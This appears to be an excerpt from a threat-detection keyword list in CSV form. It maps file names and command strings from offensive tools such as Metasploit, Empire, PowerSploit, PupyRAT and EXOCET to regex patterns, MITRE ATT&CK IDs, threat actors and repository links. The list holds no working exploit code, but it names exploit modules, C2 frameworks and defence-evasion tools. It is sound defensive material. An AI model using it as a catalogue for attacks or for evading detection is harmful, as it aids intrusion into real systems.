"*Exfiltration.tests.ps1*",".{0,1000}Exfiltration\.tests\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","43533"
"*existing_auto_target.rb*",".{0,1000}existing_auto_target\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43534"
"*exit_nimbo*",".{0,1000}exit_nimbo.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","43535"
"*EXOCET-AV-Evasion-master*",".{0,1000}EXOCET\-AV\-Evasion\-master.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","43536"
"*exocet-shellcode-exec-redo.go*",".{0,1000}exocet\-shellcode\-exec\-redo\.go.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","43537"
"*--expected Bad --expected-stop Welcome*",".{0,1000}\-\-expected\sBad\s\-\-expected\-stop\sWelcome.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Hakumarachi/Bropper","1","0","N/A","N/A","7","3","201","19","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z","43539"
"*expl-bin*",".{0,1000}expl\-bin.{0,1000}","offensive_tool_keyword","expl-bin","some of my modified exploits and some scripts.","T1210.001 - T1201 - T1059","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/sailay1996/expl-bin","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","43540"
"*explib2_ie11_exec_test_case.rb*",".{0,1000}explib2_ie11_exec_test_case\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43541"
"*exploit --get-backdoor*",".{0,1000}exploit\s\-\-get\-backdoor.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","43542"
"*exploit -j -z*","exploit\s\-j\s\-z","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","43543"
"*exploit*wordpress_add_admin*",".{0,1000}exploit.{0,1000}wordpress_add_admin.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","43544"
"*exploit.bash*",".{0,1000}exploit\.bash.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","#linux","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43545"
"*exploit.bat*",".{0,1000}exploit\.bat.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43546"
"*exploit.bin*",".{0,1000}exploit\.bin.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43547"
"*exploit.c*",".{0,1000}exploit\.c.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43548"
"*exploit.com*",".{0,1000}exploit\.com.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43549"
"*exploit.exe*",".{0,1000}exploit\.exe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43551"
"*exploit.msi*",".{0,1000}exploit\.msi.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43552"
"*exploit.pl*",".{0,1000}exploit\.pl.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43553"
"*exploit.ps1*",".{0,1000}exploit\.ps1.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43554"
"*exploit.py*",".{0,1000}exploit\.py.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43555"
"*exploit.reg*",".{0,1000}exploit\.reg.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43556"
"*exploit.run*",".{0,1000}exploit\.run.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43557"
"*exploit.sh*",".{0,1000}exploit\.sh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43558"
"*exploit.vb*",".{0,1000}exploit\.vb.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43559"
"*exploit.vbe*",".{0,1000}exploit\.vbe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43560"
"*exploit.vbs*",".{0,1000}exploit\.vbs.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43561"
"*exploit.vbscript*",".{0,1000}exploit\.vbscript.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43562"
"*exploit.zsh*",".{0,1000}exploit\.zsh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43563"
"*exploit/windows/smb/ms08_067_netapi*",".{0,1000}exploit\/windows\/smb\/ms08_067_netapi.{0,1000}","offensive_tool_keyword","metasploit","exploits often used by ransomware groups","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven - Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43564"
"*exploit/windows/smb/ms17_010_eternalblue*",".{0,1000}exploit\/windows\/smb\/ms17_010_eternalblue.{0,1000}","offensive_tool_keyword","metasploit","exploits often used by ransomware groups","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven - Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43565"
"*exploit/windows/smb/ms17_010_psexec*",".{0,1000}exploit\/windows\/smb\/ms17_010_psexec.{0,1000}","offensive_tool_keyword","metasploit","exploits often used by ransomware groups","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven - Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43566"
"*exploit_frameworks.py*",".{0,1000}exploit_frameworks\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1059 - T1078 - T1105 - T1110 - T1566","TA0002 - TA0008 - TA0009 - TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","N/A","10","52217","5629","2025-03-03T15:17:19Z","2020-04-11T09:21:31Z","43570"
"*exploit_fuse.c*",".{0,1000}exploit_fuse\.c.{0,1000}","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","N/A","4","369","56","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z","43571"
"*exploit_kctf.c*",".{0,1000}exploit_kctf\.c.{0,1000}","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","N/A","4","369","56","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z","43572"
"*exploit_oneline.md*",".{0,1000}exploit_oneline\.md.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","N/A","1","8","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z","43573"
"*exploit_suggester  *",".{0,1000}exploit_suggester\s\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","43574"
"*exploit_suggester.*",".{0,1000}exploit_suggester\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","43575"
"*exploit_suggester.py*",".{0,1000}exploit_suggester\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","43576"
"*Exploitation Toolkit*",".{0,1000}Exploitation\sToolkit.{0,1000}","offensive_tool_keyword","PRT","PRET is a new tool for printer security testing developed in the scope of a Masters Thesis at Ruhr University Bochum. It connects to a device via network or USB and exploits the features of a given printer language. Currently PostScript. PJL and PCL are supported which are spoken by most laser printers. This allows cool stuff like capturing or manipulating print jobs. accessing the printers file system and memory or even causing physical damage to the device. All attacks are documented in detail in the Hacking Printers Wiki. The main idea of PRET is to facilitate the communication between the end-user and the printer. Thus. after entering a UNIX-like command. PRET translates it to PostScript. PJL or PCL. sends it to the printer. evaluates the result and translates it back to a user-friendly format. PRET offers a whole bunch of commands useful for printer attacks and fuzzing","T1210.001 - T1027.002 - T1003 - T1505 - T1564.001","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/RUB-NDS/PRT","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","43578"
"*exploit-database-bin-sploits/*",".{0,1000}exploit\-database\-bin\-sploits\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","43579"
"*Exploit-EternalBlue.ps1*",".{0,1000}Exploit\-EternalBlue\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43580"
"*ExploitGuard_d.reg*",".{0,1000}ExploitGuard_d\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","43581"
"*Exploit-JBoss -*",".{0,1000}Exploit\-JBoss\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Exploit-JBoss.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43582"
"*Exploit-JBoss.ps1*",".{0,1000}Exploit\-JBoss\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-JBoss.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43583"
"*Exploit-Jenkins*",".{0,1000}Exploit\-Jenkins.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-Jenkins.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43584"
